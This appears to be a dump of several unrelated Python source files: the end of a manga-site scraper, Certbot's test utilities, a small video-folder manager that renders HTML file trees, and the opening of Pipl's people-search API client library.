last_page = re.search('[0-9]+', page_text).group(0)
pages = []
for num in range(1, int(last_page) + 1):
name = str(num)
url = self._get_page_url(chapter_url, name)
pages.append(Page(name, url))
return pages
@staticmethod
def _get_chapter_number(chapter):
"""Returns chapter's number from a chapter's HtmlElement"""
return chapter.text.split(' - ')[0]
@staticmethod
def _get_page_url(chapter_url, page_name):
"""Returns manga image page url"""
return re.sub('[0-9]+$', page_name, chapter_url)
class MangaReader(MangaSite):
"""class for mangareader site"""
site_url = "http://www.mangareader.net"
descending_list = False
_chapters_css = "#chapterlist td a"
_pages_css = "div#selectpage option"
_image_css = "img#img"
@property
def title(self):
"""Returns the right manga title from user input"""
return re.sub(r'[^\-a-z0-9]', '', re.sub(r'[ _]', '-', self.input_title))
@property
def title_url(self):
"""Returns the index page's url of manga title"""
# some title's page is in the root, others hidden in a random numeric subdirectory,
# so we need to search the manga list to get the correct url.
try:
content = urlopen("{0}/alphabetical".format(self.site_url)).text
page = re.findall(r'[0-9]+/' + self.title + '.html', content)[0]
url = "{0}/{1}".format(self.site_url, page)
except IndexError:
url = "{0}/{1}".format(self.site_url, self.title)
return url
@staticmethod
def _get_page_url(chapter_url, page_name='1'):
"""Returns manga image page url"""
# older stuff, the one in numeric subdirectory, typically named "chapter-X.html",
# while the new stuff only use number.
if chapter_url.endswith('.html'):
page = re.sub(r'\-[0-9]+/', "-{0}/".format(page_name), chapter_url)
return "{0}{1}".format(chapter_url, page)
else:
return "{0}/{1}".format(chapter_url, page_name)
SITES = dict(mangafox=MangaFox,
mangahere=MangaHere,
mangareader=MangaReader,
mangastream=MangaStream,
mangatown=MangaTown)
def urlopen(url):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36'}
retry = 0
while retry < 5:
try:
resp = requests.get(url, timeout=5, headers=headers)
if 400 <= resp.status_code < 500:
retry = 5
elif 500 <= resp.status_code < 600:
retry += 1
elif 'content-length' in resp.headers and \
len(resp.content) != int(resp.headers['content-length']):
retry += 1
else:
retry = 5
except Exception:
retry += 1
if not resp.content:
raise MangaException("Failed to retrieve {0}".format(url))
return resp
def progress(page, total):
"""Display progress bar"""
try:
page, total = int(page), int(total)
marks = int(round(50 * (page / total)))
spaces = int(round(50 - marks))
except Exception:
raise MangaException('Unknown error')
loader = '[' + ('#' * int(marks)) + ('-' * int(spaces)) + ']'
sys.stdout.write('%s page %d of %d\r' % (loader, page, total))
if page == total:
sys.stdout.write('\n')
sys.stdout.flush()
|
util.py
|
"""Test utilities."""
import logging
from multiprocessing import Event
from multiprocessing import Process
import shutil
import sys
import tempfile
import unittest
import warnings
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import josepy as jose
try:
import mock
warnings.warn(
"The external mock module is being used for backwards compatibility "
"since it is available, however, future versions of Certbot's tests will "
"use unittest.mock. Be sure to update your code accordingly.",
PendingDeprecationWarning
)
except ImportError: # pragma: no cover
from unittest import mock # type: ignore
import OpenSSL
import pkg_resources
import six
from six.moves import reload_module
from certbot import interfaces
from certbot import util
from certbot._internal import configuration
from certbot._internal import constants
from certbot._internal import lock
from certbot._internal import storage
from certbot.compat import filesystem
from certbot.compat import os
from certbot.display import util as display_util
def vector_path(*names):
"""Path to a test vector."""
return pkg_resources.resource_filename(
__name__, os.path.join('testdata', *names))
def load_vector(*names):
"""Load contents of a test vector."""
# luckily, resource_string opens file in binary mode
data = pkg_resources.resource_string(
__name__, os.path.join('testdata', *names))
# Try at most to convert CRLF to LF when data is text
try:
return data.decode().replace('\r\n', '\n').encode()
except ValueError:
# Failed to process the file with standard encoding.
# Most likely not a text file, return its bytes untouched.
return data
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
raise ValueError("Loader could not be recognized based on extension") # pragma: no cover
def load_cert(*names):
"""Load certificate."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate(loader, load_vector(*names))
def load_csr(*names):
"""Load certificate request."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names))
def load_comparable_csr(*names):
"""Load ComparableX509 certificate request."""
return jose.ComparableX509(load_csr(*names))
def load_rsa_private_key(*names):
"""Load RSA private key."""
loader = _guess_loader(names[-1], serialization.load_pem_private_key,
serialization.load_der_private_key)
return jose.ComparableRSAKey(loader(
load_vector(*names), password=None, backend=default_backend()))
def load_pyopenssl_private_key(*names):
"""Load pyOpenSSL private key."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
def make_lineage(config_dir, testfile, ec=False):
"""Creates a lineage defined by testfile.
This creates the archive, live, and renewal directories if
necessary and creates a simple lineage.
:param str config_dir: path to the configuration directory
:param str testfile: configuration file to base the lineage on
:returns: path to the renewal conf file for the created lineage
:rtype: str
"""
lineage_name = testfile[:-len('.conf')]
conf_dir = os.path.join(
config_dir, constants.RENEWAL_CONFIGS_DIR)
archive_dir = os.path.join(
config_dir, constants.ARCHIVE_DIR, lineage_name)
live_dir = os.path.join(
config_dir, constants.LIVE_DIR, lineage_name)
for directory in (archive_dir, conf_dir, live_dir,):
if not os.path.exists(directory):
filesystem.makedirs(directory)
sample_archive = vector_path('sample-archive{}'.format('-ec' if ec else ''))
for kind in os.listdir(sample_archive):
shutil.copyfile(os.path.join(sample_archive, kind),
os.path.join(archive_dir, kind))
for kind in storage.ALL_FOUR:
os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
os.path.join(live_dir, '{0}.pem'.format(kind)))
conf_path = os.path.join(config_dir, conf_dir, testfile)
with open(vector_path(testfile)) as src:
with open(conf_path, 'w') as dst:
dst.writelines(
line.replace('MAGICDIR', config_dir) for line in src)
return conf_path
def patch_get_utility(target='zope.component.getUtility'):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
:param str target: path to patch
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
return mock.patch(target, new_callable=_create_get_utility_mock)
def patch_get_utility_with_stdout(target='zope.component.getUtility',
stdout=None):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
The `message` argument passed to the IDisplay methods is passed to
stdout's write method.
:param str target: path to patch
:param object stdout: object to write standard output to; it is
expected to have a `write` method
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
stdout = stdout if stdout else six.StringIO()
freezable_mock = _create_get_utility_mock_with_stdout(stdout)
return mock.patch(target, new=freezable_mock)
class FreezableMock(object):
"""Mock object with the ability to freeze attributes.
This class works like a regular mock.MagicMock object, except
attributes and behavior set before the object is frozen cannot
be changed during tests.
If a func argument is provided to the constructor, this function
is called first when an instance of FreezableMock is called,
followed by the usual behavior defined by MagicMock. The return
value of func is ignored.
"""
def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
self._frozen_set = set() if frozen else {'freeze', }
self._func = func
self._mock = mock.MagicMock()
if return_value != mock.sentinel.DEFAULT:
self.return_value = return_value
self._frozen = frozen
def freeze(self):
"""Freeze object preventing further changes."""
self._frozen = True
def __call__(self, *args, **kwargs):
if self._func is not None:
self._func(*args, **kwargs)
return self._mock(*args, **kwargs)
def __getattribute__(self, name):
if name == '_frozen':
try:
return object.__getattribute__(self, name)
except AttributeError:
return False
elif name in ('return_value', 'side_effect',):
return getattr(object.__getattribute__(self, '_mock'), name)
elif name == '_frozen_set' or name in self._frozen_set:
return object.__getattribute__(self, name)
else:
return getattr(object.__getattribute__(self, '_mock'), name)
def __setattr__(self, name, value):
""" Before it is frozen, attributes are set on the FreezableMock
instance and added to the _frozen_set. Attributes in the _frozen_set
cannot be changed after the FreezableMock is frozen. In this case,
they are set on the underlying _mock.
In cases of return_value and side_effect, these attributes are always
passed through to the instance's _mock and added to the _frozen_set
before the object is frozen.
"""
if self._frozen:
if name in self._frozen_set:
raise AttributeError('Cannot change frozen attribute ' + name)
return setattr(self._mock, name, value)
if name != '_frozen_set':
self._frozen_set.add(name)
if name in ('return_value', 'side_effect'):
return setattr(self._mock, name, value)
return object.__setattr__(self, name, value)
def _create_get_utility_mock():
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
for name in interfaces.IDisplay.names(): # pylint: E1120
if name != 'notification':
frozen_mock = FreezableMock(frozen=True, func=_assert_valid_call)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
def _write_msg(message, *unused_args, **unused_kwargs):
"""Write to message to stdout.
"""
if message:
stdout.write(message)
def mock_method(*args, **kwargs):
"""
Mock function for IDisplay methods.
"""
_assert_valid_call(args, kwargs)
_write_msg(*args, **kwargs)
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
for name in interfaces.IDisplay.names(): # pylint: E1120
if name == 'notification':
frozen_mock = FreezableMock(frozen=True,
func=_write_msg)
setattr(display, name, frozen_mock)
else:
frozen_mock = FreezableMock(frozen=True,
func=mock_method)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
assert_args = [args[0] if args else kwargs['message']]
assert_kwargs = {}
assert_kwargs['default'] = kwargs.get('default', None)
assert_kwargs['cli_flag'] = kwargs.get('cli_flag', None)
assert_kwargs['force_interactive'] = kwargs.get('force_interactive', False)
display_util.assert_valid_call(*assert_args, **assert_kwargs)
class TempDirTestCase(unittest.TestCase):
"""Base test class which sets up and tears down a temporary directory"""
def setUp(self):
"""Execute before test"""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Execute after test"""
# Cleanup opened resources after a test. This is usually done through atexit handlers in
# Certbot, but during tests, atexit will not run registered functions before tearDown is
# called and instead will run them right before the entire test process exits.
# It is a problem on Windows, that does not accept to clean resources before closing them.
logging.shutdown()
# Remove logging handlers that have been closed so they won't be
# accidentally used in future tests.
logging.getLogger().handlers = []
util._release_locks() # pylint: disable=protected-access
shutil.rmtree(self.tempdir)
class ConfigTestCase(TempDirTestCase):
"""Test class which sets up a NamespaceConfig object."""
def setUp(self):
super(ConfigTestCase, self).setUp()
self.config = configuration.NamespaceConfig(
mock.MagicMock(**constants.CLI_DEFAULTS)
)
self.config.verb = "certonly"
self.config.config_dir = os.path.join(self.tempdir, 'config')
self.config.work_dir = os.path.join(self.tempdir, 'work')
self.config.logs_dir = os.path.join(self.tempdir, 'logs')
self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.server = "https://example.com"
def _handle_lock(event_in, event_out, path):
"""
Acquire a file lock on given path, then wait to release it. This worker is coordinated
using events to signal when the lock should be acquired and released.
:param multiprocessing.Event event_in: event object to signal when to release the lock
:param multiprocessing.Event event_out: event object to signal when the lock is acquired
:param path: the path to lock
"""
if os.path.isdir(path):
my_lock = lock.lock_dir(path)
else:
my_lock = lock.LockFile(path)
try:
event_out.set()
assert event_in.wait(timeout=20), 'Timeout while waiting to release the lock.'
finally:
my_lock.release()
def lock_and_call(callback, path_to_lock):
"""
Grab a lock on path_to_lock from a foreign process then execute the callback.
:param callable callback: object to call after acquiring the lock
:param str path_to_lock: path to file or directory to lock
"""
# Reload certbot.util module to reset internal _LOCKS dictionary.
reload_module(util)
emit_event = Event()
receive_event = Event()
process = Process(target=_handle_lock, args=(emit_event, receive_event, path_to_lock))
process.start()
# Wait confirmation that lock is acquired
assert receive_event.wait(timeout=10), 'Timeout while waiting to acquire the lock.'
# Execute the callback
callback()
# Trigger unlock from foreign process
emit_event.set()
# Wait for process termination
process.join(timeout=10)
assert process.exitcode == 0
def skip_on_windows(reason):
"""Decorator to skip permanently a test on Windows. A reason is required."""
def wrapper(function):
"""Wrapped version"""
return unittest.skipIf(sys.platform == 'win32', reason)(function)
return wrapper
def temp_join(path):
"""
Return the given path joined to the tempdir path for the current platform
Eg.: 'cert' => /tmp/cert (Linux) or 'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows)
"""
return os.path.join(tempfile.gettempdir(), path)
|
folderapp.py
|
#!/usr/bin/python3
"""
simple module to manage the video files generated by the camera app
"""
from pootlestuff import watchables as wv
import os, pathlib, time, threading, queue
class fileManager(wv.watchablesmart):
def __init__(self, **kwargs):
self.diskfree=wv.floatWatch(app=self, value=float('nan'))
wables=[
('basefoldervar', wv.folderWatch, '', False),
]
super().__init__(wabledefs=wables, **kwargs)
self.currentfiles=None
self.filetime=time.time()
self.cq=queue.Queue()
self.running=True
self.fthread=threading.Thread(name='filer', target=self.slowthread)
self.fthread.start()
def make_page(self, pagelist, qp, pp, page):
if self.currentfiles is None or 'refresh' in qp:
self.currentfiles=filething(root=self.basefoldervar.getValue())
self.filetime=time.time()
with open(page, 'r') as pf:
return {'resp':200, 'headers': (('Content-Type', 'text/html; charset=utf-8'),), 'data': pf.read().format(stuff=self.currentfiles.make_html())}
def vidpage(self, pagelist, qp, pp):
return vpage.format(qp['fileid'][0])
def resolvevidfile(self, qp):
fp=self.basefoldervar.getFolder()/qp['fileid'][0]
return fp
def slowthread(self):
cmd=None
while self.running:
if cmd is None:
fp=self.basefoldervar.getValue()
diskinfo=os.statvfs(fp)
nv=diskinfo.f_bavail/diskinfo.f_blocks
self.diskfree.setValue(nv,wv.myagents.app)
try:
cmd=self.cq.get(timeout=10)
except queue.Empty:
cmd=None
def stopme(self):
self.running=False
self.cq.put('stop')
self.fthread.join()
def sizestr(size):
if size < 10000:
return '{:,}B '.format(size)
if size < 10000000:
return '{:,}KB'.format((size+499)//1000)
if size < 10000000000:
return '{:,}MB'.format((size+499999)//1000000)
return '{:,}GB'.format((size+499999999)//1000000000)
filestr='%s%-25s (%7s)'
class filething():
def __init__(self, root, sorton='name', filtercount=None, showerrors=True):
assert sorton in ('name', 'size')
rp=pathlib.Path(root).expanduser().resolve()
basedepth=len(str(rp).split('/'))
xgen=os.fwalk(str(rp),)
xgc=0
print('in', rp)
for dirpath, dirnames, filenames, dir_fd in xgen:
pathsplit=dirpath.split('/')
try:
finfos=[(fn, os.stat(fn, dir_fd=dir_fd).st_size) for fn in filenames]
except:
finfos=[]
for fn in filenames:
try:
finfos.append((fn, os.stat(fx, dir_fd=dir_fd).st_size))
except:
if showerrors:
print('oops at', fn, 'in', dirpath)
filtcount=0
if not filtercount is None:
for fn in filenames:
if fn.endswith(filtercount):
filtcount+=1
if sorton=='name':
sortix=0
sreverse=False
elif sorton=='size':
sortix=1
sreverse=True
else:
raise ValueError('I cannot sort on' + str(sorton))
finfos.sort(key=lambda x: x[sortix], reverse=sreverse)
dirdict={'folds': {},
'files': dict(finfos),
'path' : dirpath,
'name' : pathsplit[-1]}
pcount=len(pathsplit)-basedepth
if pcount==0:
self.data=dirdict
plist=[dirdict]
elif pcount==len(plist):
plist[-1]['folds'][pathsplit[-1]] = dirdict
plist.append(dirdict)
elif pcount > len(plist):
print('NEVERRRRRRRRRRR')
elif pcount < len(plist):
while pcount < len(plist):
finished = plist.pop(-1)
finished['size'] = sum(finished['files'].values()) + sum(f['size'] for f in finished['folds'].values())
finished['filtc'] = len(finished['files']) + sum(f['filtc'] for f in finished['folds'].values())
if len(finished['folds']) > 0:
sx=list(finished['folds'].items())
sx.sort(key=lambda kv: kv[1][sorton], reverse=sreverse)
finished['folds']=dict(sx)
plist[-1]['folds'][pathsplit[-1]] = dirdict
plist.append(dirdict)
else:
print('too steep?')
xgc +=1
while len(plist) > 0:
finished=plist.pop(-1)
finished['size'] = sum(finished['files'].values()) + sum(f['size'] for f in finished['folds'].values())
if len(finished['folds']) > 0:
sx=list(finished['folds'].items())
sx.sort(key=lambda kv: kv[1][sorton], reverse=sreverse)
finished['folds']=dict(sx)
print(sizestr(self.data['size']))
def pretty(self, levels=2):
prettydict(self.data, levels=levels, indent=0)
def make_html(self):
return '<p>no files found</p>' if len(self.data['files'])==0 and len(self.data['folds']) == 0 else '<ul class="ftree">\n'+htmldict(self.data, indent=1)+'</ul>\n'
lifilehtml='{ind:s}<li><span>{name:s}</span><span>{size:s}</span><input type="checkbox" name="x" value=""></li>\n'
lilifihtml="""{ind:s}<li><span onclick="showvid('{upstr}/{dn}/{name}')" style="cursor: pointer;" >{name:s}</span><span>{size:s}</span><input type="checkbox" name="{upstr}/{dn}/{name}" value=""></li>\n"""
lifoldhtml='{ind:s}<li{preop}><a href="#"><span>{name:s}</span></a>{size:s}\n{ind:s}<ul class="ftree">\n{fstr:s}{ind:s}</ul></li>\n'
def htmldict(adict, indent, upstr=''):
istr=' ' * indent
files=[(lilifihtml if fn.endswith('.mp4') else lifilehtml).format(ind=istr, name=fn, dn=adict['name'], size=sizestr(fs), upstr=upstr) for fn, fs in adict['files'].items()]
upstr='' if indent==1 else adict['name'] if indent==2 else upstr+'/'+adict['name']
flist=list(adict['folds'].values())
if flist:
folds=[lifoldhtml.format(
ind=istr, name=fdict['name'], size=sizestr(fdict['size']), fstr=htmldict(fdict, indent+1, upstr), preop='')
for fdict in flist[:-1]]
fdict=flist[-1]
folds.append(lifoldhtml.format(
ind=istr, name=fdict['name'], size=sizestr(fdict['size']), fstr=htmldict(fdict, indent+1, upstr), preop=' class="open" '))
else:
folds=[]
return ''.join(folds)+''.join(files)
def prettydict(adict, levels, indent):
prestr='| ' * indent
print('{:s}{:22s} {:s}'.format(prestr, adict['name'], sizestr(adict['size'])))
if levels > 0:
prestr += '| '
for fn, fs in adict['files'].items():
print('{:s}{:22s} {:s}'.format(prestr, fn, sizestr(fs)))
for dn in adict['folds'].values():
prettydict(dn, levels-1, indent+1)
|
search.py
|
"""Python wrapper for easily making calls to Pipl's Search API.
Pipl's Search API allows you to query with the information you have about
a person (his name, address, email, phone, username and more) and in response
get all the data available on him on the web.
The classes contained in this module are:
- SearchAPIRequest -- Build your request and send it.
- SearchAPIResponse -- Holds the response from the API in case it contains data.
- SearchAPIError -- An exception raised when the API response is an error.
The classes are based on the person data-model that's implemented here in the
sub-package piplapis.data.
"""
import json
import datetime
import logging
import pytz as pytz
from six import string_types
try:
import urllib.request as urllib2
from urllib.parse import urlencode
except ImportError:
import urllib2
from urllib import urlencode
import urllib
import itertools
import threading
import piplapis
from piplapis.data.available_data import AvailableData
from piplapis.error import APIError
from piplapis.data import *
from piplapis.data.utils import Serializable
logger = logging.getLogger(__name__)
class SearchAPIRequest(object):
"""A request to Pipl's Search API.
Building the request from the query parameters can be done in two ways:
Option 1 - directly and quickly (for simple requests with only few
parameters):
>>> from piplapis.search import SearchAPIRequest
>>> request = SearchAPIRequest(api_key='samplekey', email='clark.kent@example.com')
>>> response = request.send()
Option 2 - using the data-model (useful for more complex queries; for
example, when there are multiple parameters of the same type
such as few phones or a few addresses or when you'd like to use
information beyond the usual identifiers such as name or email,
information like education, job, relationships etc):
>>> from piplapis.search import SearchAPIRequest
>>> from piplapis.data import Person, Name, Address, Job
>>> fields = [Name(first='Clark', last='Kent'),
>>> Address(country='US', state='KS', city='Smallville'),
>>> Address(country='US', state='KS', city='Metropolis'),
>>> Job(title='Field Reporter')]
>>> request = SearchAPIRequest(api_key='samplekey',
>>> person=Person(fields=fields))
>>> response = request.send()
Sending the request and getting the response is very simple and can be done
by either making a blocking call to request.send() or by making
a non-blocking call to request.send_async(callback) which sends the request
asynchronously.
You can also set various request flags:
minimum_probability - a float between 0 and 1, to define what statistical confidence you need for inferred data.
show_sources - string, either "all", "matching" or True. If not set, no sources will be shown.
"all" - all sources will be shown.
"matching" - only sources belonging to a matching person will be shown.
Boolean True will behave like "matching".
hide_sponsored - boolean (default False), whether to hide sponsored results.
infer_persons - boolean (default False), whether the API should return person responses made up solely from data inferred by statistical analysis.
minimum_match - a float between 0 and 1, to define the minimum match under which possible persons will not be returned.
that may be the person you're looking for)
live_feeds - boolean (default True), whether to use live data feeds. Can be turned off
for performance.
"""
HEADERS = {'User-Agent': 'piplapis/python/%s' % piplapis.__version__}
BASE_URL = '{}://api.pipl.com/search/?'
# The following are default settings for all request objects
# You can set them once instead of passing them to the constructor every time
default_api_key = 'sample_key'
default_use_https = False
default_minimum_probability = None
default_show_sources = None
default_minimum_match = None
default_hide_sponsored = None
default_live_feeds = None
default_infer_persons = None
default_match_requirements = None
default_source_category_requirements = None
default_response_class = None
@classmethod
def set_default_settings(cls, api_key=None, minimum_probability=None, show_sources=None,
minimum_match=None, hide_sponsored=None, live_feeds=None, use_https=False,
match_requirements=None, source_category_requirements=None, infer_persons=None,
response_class=None):
cls.default_api_key = api_key
cls.default_minimum_probability = minimum_probability
cls.default_show_sources = show_sources
cls.default_minimum_match = minimum_match
cls.default_hide_sponsored = hide_sponsored
cls.default_live_feeds = live_feeds
cls.default_use_https = use_https
cls.default_match_requirements = match_requirements
cls.default_source_category_requirements = source_category_requirements
cls.default_infer_persons = infer_persons
cls.default_response_class = response_class
def __init__(self, api_key=None, first_name=None, middle_name=None,
last_name=None, raw_name=None, email=None, phone=None, country_code=None,
raw_phone=None, username=None, country=None, state=None, city=None,
raw_address=None, from_age=None, to_age=None, person=None,
search_pointer=None, minimum_probability=None, show_sources=None,
minimum_match=None, hide_sponsored=None, live_feeds=None, use_https=None,
match_requirements=None, source_category_requirements=None, infer_persons=None,
response_class=None):
"""Initiate a new request object with given query params.
Each request must have at least one searchable parameter, meaning
a name (at least first and last name), email, phone or username.
Multiple query params are possible (for example querying by both email
and phone of the person).
Args:
:param api_key: str, a valid API key (use "samplekey" for experimenting).
Note that you can set a default API key
(piplapis.search.default_api_key = '<your_key>') instead of
passing it to each request object.
:param first_name: unicode, minimum 2 chars.
:param middle_name: unicode.
:param last_name: unicode, minimum 2 chars.
:param raw_name: unicode, an unparsed name containing at least a first name
and a last name.
:param email: unicode.
:param phone: int/long. A national phone with no formatting.
:param country_code: int. The phone country code
:param raw_phone: string. A phone to be sent as-is, will be parsed by Pipl.
:param username: unicode, minimum 4 chars.
:param country: unicode, a 2 letter country code from:
http://en.wikipedia.org/wiki/ISO_3166-2
:param state: unicode, a state code from:
http://en.wikipedia.org/wiki/ISO_3166-2%3AUS
http://en.wikipedia.org/wiki/ISO_3166-2%3ACA
:param city: unicode.
:param raw_address: unicode, an unparsed address.
:param from_age: int.
:param to_age: int.
:param person: A Person object (available at piplapis.data.Person).
The person can contain every field allowed by the data-model
(see piplapis.data.fields) and can hold multiple fields of
the same type (for example: two emails, three addresses etc.)
:param search_pointer: str, sending a search pointer of a possible person will retrieve
more data related to this person.
:param minimum_probability: float (0-1). The minimum required confidence for inferred data.
:param show_sources: str or bool, one of "matching"/"all". "all" will show all sources, "matching"
only those of the matching person. Boolean True will behave like "matching".
:param minimum_match: float (0-1). The minimum required match under which possible persons will not be returned.
:param live_feeds: bool, default True. Whether to use live feeds. Only relevant in plans that include
live feeds. Can be set to False for performance.
:param hide_sponsored: bool, default False. Whether to hide sponsored results.
:param infer_persons: bool, default False. Whether the API should return person responses made up solely from data inferred by statistical analysis.
:param use_https: bool, default False. Whether to use an encrypted connection.
:param match_requirements: str/unicode, a match requirements criteria. This criteria defines what fields
must be present in an API response in order for it to be returned as a match.
For example: "email" or "email or phone", or "email or (phone and name)"
:param source_category_requirements: str/unicode, a source category requirements criteria. This criteria defines
what source categories must be present in an API response in order for it to be
returned as a match. For example: "personal_profiles" or "personal_profiles or professional_and_business"
:param response_class: object, an object inheriting SearchAPIResponse and adding functionality beyond the basic
response scope. This provides the option to override methods or just add them.
Each of the arguments that should have a unicode value accepts both
unicode objects and utf8 encoded str (will be decoded automatically).
"""
if person is None:
person = Person()
if first_name or middle_name or last_name:
name = Name(first=first_name, middle=middle_name, last=last_name)
person.add_fields([name])
if raw_name:
person.add_fields([Name(raw=raw_name)])
if email:
person.add_fields([Email(address=email)])
if phone or raw_phone:
person.add_fields([Phone(country_code=country_code, number=phone, raw=raw_phone)])
if username:
person.add_fields([Username(content=username)])
if country or state or city:
address = Address(country=country, state=state, city=city)
person.add_fields([address])
if raw_address:
person.add_fields([Address(raw=raw_address)])
if from_age is not None or to_age is not None:
dob = DOB.from_age_range(from_age or 0, to_age or 1000)
person.add_fields([dob])
person.search_pointer = search_pointer
self.person = person
self.api_key = api_key or self.default_api_key
self.show_sources = show_sources if show_sources is not None else self.default_show_sources
self.live_feeds = live_feeds if live_feeds is not None else self.default_live_feeds
self.minimum_match = minimum_match or self.default_minimum_match
self.minimum_probability = minimum_probability or self.default_minimum_probability
self.hide_sponsored = hide_sponsored if hide_sponsored is not None else self.default_hide_sponsored
self.match_requirements = match_requirements or self.default_match_requirements
self.source_category_requirements = source_category_requirements or self.default_source_category_requirements
self.use_https = use_https if use_https is not None else self.default_use_https
self.infer_persons = infer_persons if infer_persons is not None else self.default_infer_persons
response_class = response_class or self.default_response_class
self.response_class = response_class if response_class and issubclass(response_class, SearchAPIResponse) \
else SearchAPIResponse
def validate_query_params(self, strict=True):
"""Check if the request is valid and can be sent, raise ValueError if
not.
:param strict, boolean. If True, an exception is raised on every
invalid query parameter, if False an exception is raised only when the search
request cannot be performed because required query params are missing.
"""
if not self.api_key:
raise ValueError('API key is missing')
if strict:
if self.minimum_match and (type(self.minimum_match) is not float or
self.minimum_match > 1 or self.minimum_match < 0):
raise ValueError('minimum_match should be a float between 0 and 1')
if self.hide_sponsored is not None and type(self.hide_sponsored) is not bool:
raise ValueError('hide_sponsored should be a boolean')
if self.infer_persons is not None and type(self.infer_persons) is not bool:
raise ValueError('infer_persons should be a boolean')
if self.live_feeds is not None and type(self.live_feeds) is not bool:
raise ValueError('live_feeds should be a boolean')
if self.match_requirements is not None and not isinstance(self.match_requirements, string_types):
raise ValueError('match_requirements should be an str or unicode object')
if self.source_category_requirements is not None and not isinstance(self.source_category_requirements,
string_types):
raise ValueError('source_category_requirements should be an str or unicode object')
if self.show_sources not in ("all", "matching", "false", "true", True, False, None):
raise ValueError('show_sources has a wrong value. Should be "matching", "all", True, False or None')
if self.minimum_probability and (type(self.minimum_probability) is not float or
self.minimum_probability > 1 or self.minimum_probability < 0):
raise ValueError('minimum_probability should be a float between 0 and 1')
if self.person.unsearchable_fields:
raise ValueError('Some fields are unsearchable: %s' % self.person.unsearchable_fields)
if not self.person.is_searchable:
raise ValueError('No valid name/username/user_id/phone/email/address or search pointer in request')
@property
def url(self):
"""The URL of the request (str)."""
query = self.get_search_query()
return self.get_base_url() + urllib.urlencode(query, doseq=True)
def get_search_query(self):
query = {"key": self.api_key}
if self.person and self.person.search_pointer:
query['search_pointer'] = self.person.search_pointer
elif self.person:
query['person'] = self.person.to_json()
if self.minimum_probability is not None:
query['minimum_probability'] = self.minimum_probability
if self.minimum_match is not None:
query['minimum_match'] = self.minimum_match
if self.hide_sponsored is not None:
query['hide_sponsored'] = self.hide_sponsored
if self.infer_persons is not None:
query['infer_persons'] = self.infer_persons
if self.match_requirements is not None:
query['match_requirements'] = self.match_requirements
if self.source_category_requirements is not None:
query['source_category_requirements'] = self.source_category_requirements
if self.live_feeds is not None:
query['live_feeds'] = self.live_feeds
if self.show_sources is not None:
query['show_sources'] = self.show_sources
return query
def send(self, strict_validation=True):
"""Send the request and return the response or raise SearchAPIError.
calling this method blocks the program until the response is returned,
if you want the request to be sent asynchronously please refer to the
send_async method.
the response is returned as a SearchAPIResponse object.
:param strict_validation: bool. Used by self.validate_query_params.
:raises ValueError (raised from validate_query_params),
httpError/URLError and SearchAPIError (when the response is returned
but contains an error).
example:
>>> from piplapis.search import SearchAPIRequest, SearchAPIError
>>> request = SearchAPIRequest('samplekey', email='clark.kent@example.com')
>>> try:
... response = request.send()
... except SearchAPIError as e:
... print e.http_status_code, e
:return: A Response from the API
:rtype: SearchAPIResponse
"""
self.validate_query_params(strict=strict_validation)
query = self.get_search_query()
request = urllib2.Request(url=self.get_base_url(), data=urlencode(query, True).encode(),
headers=SearchAPIRequest.HEADERS)
try:
response = urllib2.urlopen(request)
json_response = response.read().decode()
search_response = self.response_class.from_json(json_response)
search_response._add_rate_limiting_headers(*self._get_quota_and_throttle_data(response.headers))
return search_response
except urllib2.HTTPError as e:
json_error = e.read()
if not json_error:
raise e
try:
exception = SearchAPIError.from_json(json_error.decode())
exception._add_rate_limiting_headers(*self._get_quota_and_throttle_data(e.headers))
raise exception
except ValueError:
raise e
@staticmethod
def _get_quota_and_throttle_data(headers):
# Set default values
(quota_allotted, quota_current, quota_reset, qps_allotted, qps_current, qps_live_allotted, qps_live_current,
qps_demo_allotted, qps_demo_current, demo_usage_allotted, demo_usage_current, demo_usage_expiry) = (None,) * 12
time_format = "%A, %B %d, %Y %I:%M:%S %p %Z"
# Handle quota headers
if 'X-APIKey-Quota-Allotted' in headers:
quota_allotted = int(headers.get('X-APIKey-Quota-Allotted'))
if 'X-APIKey-Quota-Current' in headers:
quota_current = int(headers.get('X-APIKey-Quota-Current'))
if 'X-Quota-Reset' in headers:
datetime_str = headers.get('X-Quota-Reset')
quota_reset = datetime.datetime.strptime(datetime_str, time_format).replace(tzinfo=pytz.utc)
# Handle throttling
if 'X-QPS-Allotted' in headers:
qps_allotted = int(headers.get('X-QPS-Allotted'))
if 'X-QPS-Current' in headers:
qps_current = int(headers.get('X-QPS-Current'))
if 'X-QPS-Live-Allotted' in headers:
